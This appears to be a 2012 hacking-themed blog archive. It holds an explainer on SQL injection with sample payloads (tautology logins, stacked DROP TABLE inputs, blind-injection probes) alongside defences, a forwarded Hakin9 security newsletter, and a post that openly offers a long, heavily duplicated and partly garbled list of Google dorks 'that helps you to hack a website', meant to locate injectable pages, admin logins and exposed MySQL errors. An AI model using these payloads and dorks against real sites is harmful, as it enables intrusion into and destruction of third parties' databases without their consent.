Thursday 12 July 2012

SQL injection

SQL injection (CLICK TO TRY SQL INJECTION YOURSELF) is a technique often used to attack databases through a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g. dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
In operational environments, it has been noted that applications experience, on average, 71 attempts an hour.[1] When under direct attack, some applications occasionally came under aggressive attacks and at their peak, were attacked 800–1300 times per hour.



Forms and Validity

SQL Injection Attack (SQLIA) is considered one of the top 10 web application vulnerabilities of 2007 and 2010 by the Open Web Application Security Project.[2] The attacking vector contains five main sub-classes depending on the technical aspects of the attack's deployment:
  • Classic SQLIA
  • Inference SQL Injection
  • Interacting with SQL Injection
  • DBMS specific SQLIA
  • Compounded SQLIA
Some security researchers propose that Classic SQLIA is outdated[3] though many web applications are not hardened against them. Inference SQLIA is still a threat, because of its dynamic and flexible deployment as an attacking scenario. The DBMS specific SQLIA should be considered as supportive regardless of the utilization of Classic or Inference SQLIA. Compounded SQLIA is a new term derived from research on SQL Injection Attacking Vector in combination with other different web application attacks as:
A complete overview of the SQL Injection classification is presented in the next figure. The Storm Worm is one representation of Compounded SQLIA.[8]
A Classification of SQL Injection Attacking Vector till 2010
A Classification of SQL Injection Attacking Vector till 2010
This classification represents the state of SQLIA, respecting its evolution until 2010—further refinement is underway.










Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation of the statements performed on the database by the end-user of the application.
The following line of code illustrates this vulnerability
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as
' or '1'='1
or using comments to even block the rest of the query (there are three types of SQL comments):[10]
' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '
renders one of the following SQL statements by the parent language:
SELECT * FROM users WHERE name = '' OR '1'='1';
SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
If this code were to be used in an authentication procedure then this example could be used to force the selection of a valid username because the evaluation of '1'='1' is always true.
The following value of "userName" in the statement below would cause the deletion of the "users" table as well as the selection of all data from the "userinfo" table (in essence revealing the information of every user), using an API that allows multiple statements:
a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't
This input renders the final SQL statement as follows and specified:
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
While most SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs such as PHP's mysql_query(); function do not allow this for security reasons. This prevents attackers from injecting entirely separate queries, but doesn't stop them from modifying queries.

Incorrect type handling

This form of SQL injection occurs when a user-supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in a SQL statement, but the programmer makes no checks to validate that the user supplied input is numeric. For example:
statement := "SELECT * FROM userinfo WHERE id = " + a_variable + ";"
It is clear from this statement that the author intended a_variable to be a number correlating to the "id" field. However, if it is in fact a string then the end-user may manipulate the statement as they choose, thereby bypassing the need for escape characters. For example, setting a_variable to
1;DROP TABLE users
will drop (delete) the "users" table from the database, since the SQL would be rendered as follows:
SELECT * FROM userinfo WHERE id=1;DROP TABLE users;

Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.[11]

Conditional responses

One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen.
SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='1';
will result in a normal page while
SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to a SQL injection. An injection like this may suggest to the attacker that a blind SQL injection is possible, leaving the attacker to devise statements that evaluate to true or false depending on the contents of another column or table outside of the SELECT statement's column list.[12]
SELECT 1/0 FROM users WHERE username='ooo';
Another type of blind SQL injection uses a conditional timing delay on which the attacker can learn whether the SQL statement resulted in a true or in a false condition [



Parameterized statements

With most development platforms, parameterized statements can be used that work with parameters (sometimes called placeholders or bind variables) instead of embedding user input in the statement. A placeholder can only store the value of the given type and not the arbitrary SQL fragment. Hence the SQL injection would simply be treated as a strange (and probably invalid) parameter value.
In many cases, the SQL statement is fixed, and each parameter is a scalar, not a table. The user input is then assigned (bound) to a parameter.[14]

Enforcement at the coding level

Using object-relational mapping libraries avoids the need to write SQL code. The ORM library in effect will generate parameterized SQL statements from object-oriented code.

Escaping

A straightforward, though error-prone, way to prevent injections is to escape characters that have a special meaning in SQL. The manual for an SQL DBMS explains which characters have a special meaning, which allows creating a comprehensive blacklist of characters that need translation. For instance, every occurrence of a single quote (') in a parameter must be replaced by two single quotes ('') to form a valid SQL string literal. For example, in PHP it is usual to escape parameters using the function mysql_real_escape_string(); before sending the SQL query:
$query = sprintf("SELECT * FROM `Users` WHERE UserName='%s' AND Password='%s'",
                  mysql_real_escape_string($Username),
                  mysql_real_escape_string($Password));
mysql_query($query);
This function, i.e. mysql_real_escape_string(), calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. This function must always (with few exceptions) be used to make data safe before sending a query to MySQL.[15]
There are other functions for many database types in PHP such as pg_escape_string() for PostgreSQL. There is, however, one function that works for escaping characters, and is used especially for querying on databases that do not have escaping functions in PHP. This function is: addslashes(string $str ). It returns a string with backslashes before characters that need to be quoted in database queries, etc. These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).[16]
Routinely passing escaped strings to SQL is error prone because it is easy to forget to escape a given string. Creating a transparent layer to secure the input can reduce this error-proneness, if not entirely eliminate it.[17]

Pattern check

Integer, float or boolean parameters can be checked if their value is valid representation for the given type. Strings that must follow some strict pattern (date, UUID, alphanumeric only, etc.) can be checked if they match this pattern.

Database Permissions

Limiting the permissions on the database logon used by the web application to only what is needed may help reduce the effectiveness of any SQL injection attacks that exploit any bugs in the web application.
For example on SQL server, a database logon could be restricted from selecting on some of the system tables which would limit exploits that try into insert JavaScript into all the text columns in the database.
deny SELECT ON sys.sysobjects TO webdatabaselogon;
deny SELECT ON sys.objects TO webdatabaselogon;
deny SELECT ON sys.TABLES TO webdatabaselogon;
deny SELECT ON sys.views TO webdatabaselogon;

Wednesday 11 July 2012

GOOGLE DORKS LIST FOR SQL INJECTION

Hi folks...
Todai i am sharing with you a list of google dorks for sql injection which is one of most used method to hack a website. I already described the BASIC SQL INJECTION and ATTACK A WEBSITE USING SQL INJECTION. So today here is the all google dorks for sql injection that helps you to hack a website. So here we go...
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Saturday 2 June 2012

Fwd: We have your fingerprint! New Hakin9 Issue is out!

---------- Forwarded message ----------
From: Hakin9 <newsletteren@hakin9.org>
Date: Fri, 01 Jun 2012 22:08:55 +0200
Subject: We have your fingerprint! New Hakin9 Issue is out!
To: tanwarimran <taibamanasa@gmail.com>

New Hakin9 Issue is out! The main topic: Biometrics! Inside:















Biometrics: Secure? Hackable? You Decide...
By Gary S. Miliefsky
The Biometric System used for security is similar to a door lock and a
mechanical key. With the right key, you can unlock and open the door. By
providing your unique ID, known as your "biometric" or if multi-faceted
(your finger and your retina print), your "biometrics", you are providing
the proper key to open the lock, which is also known as a Biometric Security
System.
As these Biometric Security Systems have evolved, they continue to be based
on seven basic criteria – uniqueness, universality, permanence,
collectability, performance, acceptability and circumvention. If you really
want to get into the history of biometrics just google "Schuckers biometric
security systems" and you could spend all day reading and learning about it.



Life with Biometrics
By Randy Naramore

Biometric Authentication has been heralded as the future of security
systems, a verification system that not only drastically reduces the risks
of the systems security being compromised but also eliminates the need for
much of the traditional security overhead. In recent years biometric
authentication systems have become more prolific as numerous manufacturers
of biometric sensing devices and middle-ware providers have entered the
market. Having met with particular success in restricting physical access in
high-security environments it is curious to note that this success has not
been echoed where network authentication is concerned. It is with this in
mind that we look at the pros and cons of biometric authentication for
networks and investigate whether this slowness of uptake is an indication of
things to come or whether biometric authentication is the next big thing,
worthy of all the claims of its biggest proponents.




Biometric Authentication In It Security: An Introduction
By AYO Tayo-Balogun

This is the process through which the raw biometric data is captured. This
is the first contact of the user with the biometric system. The user's
biometric sample is obtained using an input device. Quality of the first
biometric sample is crucial for further authentications of this user. It may
happen that even multiple acquisitions do not generate biometric samples
with sufficient quality. Such a user cannot be registered with the system.
There are also mute people, people without fingers or with injured eyes.
Both these categories create a 'fail to enrol' (FTE) group of users. Users
very often do not have any previous experience with the kind of the
biometric system they are being registered with, so the first measurement
should be guided by a professional who explains the use of the biometric
reader. Depending on the technology being implemented, the data captured
could be a facial image, a fingerprint, voice data, etc.


The Day That Fingerprints Has Rule Out From Being An Evidence
By Amitay Dan

Some of the main target in the crime scene which is leader of the biggest
drug cartel is being arrested of killing two people, he did a mistake and
didn't hide the gun well. Two years before, the crime cartel got an idea
from hackers who helped them. The idea was simple: instead of hiding the
fingerprints with gloves, they can steal 100,000 people fingerprint from
workers clock in/out and then add to this stolen database to the cartel
fingerprints database. The next act was to share the database in the
Internet so anyone will be able to fake with it his fingerprints. The idea
got spread to many other cartels and crime members together with privacy
freedom fighter has been start to share their own biometric info, included
fingerprints. Back to the court, the judge got a new breakthrough claim from
the suspect's lawyer, "the fingerprint is in public database for two years,
and any one can use it" the judge in the first time in the history declaim
the fingerprint as proof for the crime since public data can't be an
evidence of one person.



A thin database access abstraction layer for ADO.NET on .NET / Mono
By Moreno Airoldi
Later, Microsoft released a successor to ODBC: OLE DB. This new technology
was object oriented, based on COM – component object model, and aimed to
improve its predecessor in terms of performance, providing a way to write
drivers which were less abstracted and closer to the database server's APIs,
and more open to non-relational database systems. Although it was widely
used, mainly because Microsoft made it the standard way to access their
database system SQL Server, it never became as popular as ODBC. One of the
main factors that prevented OLE DB to be adopted was the fact it is
available on Windows only. Being based on COM, a Windows-only technology, it
would be hard, if not impossible to port it to other operating systems. The
doom for OLE DB was spelled at the end of the 90s, when Microsoft decided to
switch its focus away from COM, a technology which although highly
successful, was very complex to maintain and to develop for, and not ideal
to fight the emerging Java platform on its own ground. With its new
technology for software development: the .NET Framework, specifically
designed to compete with Java, from which it took almost all of its
features; Microsoft presented yet another database access technology:
ADO.NET.



Security issue in SMS Banking
By Amar
You might now wonder what insecurities could really be there in such a
seemingly foolproof design. Very true, Cross site scripting, SQL injection
and Buffer overflow attacks may not be possible from a cell phone but there
are vulnerable points in the architecture which can be attacked: they are
the mobile banking application and the bulk service provider's server. If an
attacker reconstructs any one of the two HTTPS requests (sent from the bulk
service provider to the mobile banking application or vice-versa), he will
be able to flood the valid user with SMS messages. This may lead to the user
believing that someone else is requesting the account details on his behalf.
Worse if the application displays the information contained in the second
request message (from the mobile banking application to the bulk service
provider) after the attacker has successfully created the first request
message (from the bulk service provider to the mobile banking application)
on the browser itself, he will get to see critical information like the
account balance details of a valid user.



Directory Traversal Vulnerability
By Bojan Alikavazović

Directory traversal attacks are usually very easy to perform, especially
when it comes to services like FTP and TFTP. They become more complex at the
web applications. In short, the idea is to traverse to the any file in the
system and be able to read or download files with useful information
(hashes/passwords etc.). This article describes the directory traversal
vulnerabilities in a variety of services such as FTP, TFTP, HTTP and Web
apps. During the tests a very interesting program DotDotPwn has beed used to
perform various types of attacks.



Using REMnux to analyze PE files
By Glenn P. Edwards Jr.
The first step is to identify what the file you are analyzing actually is
so we know which analysis tools to use. Since simply going off the file
extension can be misleading we can try to identify the file type a few
different ways: file, TrID [3], hachoir-metadata, hex editor (xxd) and 7zip
(7z).
Most of you may be familiar with the file command since it has been around
for a while so for the sake of brevity – just remember it uses 'magic
numbers' to identify file types.
TrID identifies files based on their binary signatures, has no fixed rules
and can be continuously updated/trained on new file types. If you run TrID
against a single file it will display which type of file it matches and the
percent of that match as show in (Figure 1).



Why HR Matters – How Organisations Create Their Own Insider Threat
By Drake
So, nearing the end of his probationary period, he decided it was time to
move on, and part company with his current employers. Just as he was
contemplating his options, he received a letter from the company's HR
function, happily telling him that his notice period was now extended to one
month. This was news to him, as his contract said three months. In any case,
he shrugged his shoulders, found another job, and in due course came to
resign. What happened next was really quite upsetting for him – in the HR
function there was another person with a similar name to him, who happened
to be involved with sorting our his affairs ( he had by this stage produced
the previously mentioned letter, to "help things along"). Soon, he found
himself being accidentally copied in to the e-mail trail, where some quite
unsatisfactory things were being said about him. The dénouement of the
story was that he threatened his (now ex) employer with legal action.





Still do not have a subscription? Don't wait any longer!
Subscribe now and get Hakin9 Bible for FREE!





























Please spread the word about Hakin9.
Hakin9 team wish you good reading!
en@hakin9.org
Hakin9.org Click here to unsubscribe
http://mytalkoot.com/12all/box.php?nl=9&c=2473&m=1701&s=5176d7cf014c2f3457c67313955a1d2c&funcml=unsub2


Email marketing by

Thursday 26 April 2012

Real Player offline istallation |Hack the Hackers

Where can you download the latest official Real Player SP standalone offline installer so that you don’t have to download the full setup files over and over for installing more than one computer / laptop?

